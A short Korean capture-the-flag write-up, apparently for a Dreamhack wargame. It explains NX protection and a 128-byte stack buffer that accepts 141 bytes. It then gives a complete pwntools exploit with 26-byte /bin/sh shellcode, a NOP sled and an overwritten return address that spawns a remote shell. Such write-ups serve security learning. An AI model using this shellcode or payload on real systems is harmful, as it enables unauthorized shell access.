<aside> 💊 NX가 disabled이므로 ShellCode의 실행이 가능해짐.

</aside>

NX bit

• NX 비트를 활성화 시켜 스택/힙 영역의 실행 권한을 제거하여 쉘의 실행을 방지하는 기법
• 우회 기법
  • RTL, GOT, overwirte, ROP .....

Source Code

• main 함수에서 128byte크기의 buf를 선언하고 buf의 주소를 출력한 다음, 141byte만큼을 입력받는다.
  • buf의 크기는 128byte나 입력값은 141byte만큼 입력이 가능하다.
    • 즉, overflow가 발생한다.
• 프로그램이 실행되면 스택은 buf | stack frame point | return address 로 생성될테니, buf에 /bin/sh을 실행하는 Shellcode를 삽입하고, ret에 처음 프로그램 실행시 제공해주는 buf의 주소값을 넣어주면 최종적으로 shell이 실행된다.

<aside> 🎰 26byte 쉘코드를 사용해야한다. scanf는 0x0b를 만나면 입력을 종료한다.

</aside>

from pwn import *

p = remote("host1.dreamhack.games", 17596)

a = p.recvuntil("buf = (")
buf = int(p.recv(10), 16)
print(buf)
p.recvline()

payload = b"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x08\\x40\\x40\\x40\\xcd\\x80"
# 26byte shellcode
payload += b"\\x90"*106
# buf[128byte]+sfp[4byte] = 132byte
payload += p32(buf)
#ret[4byte]
p.sendline(payload)
p.interactive()

• Python2버젼일 경우 문자열 앞 'b' 삭제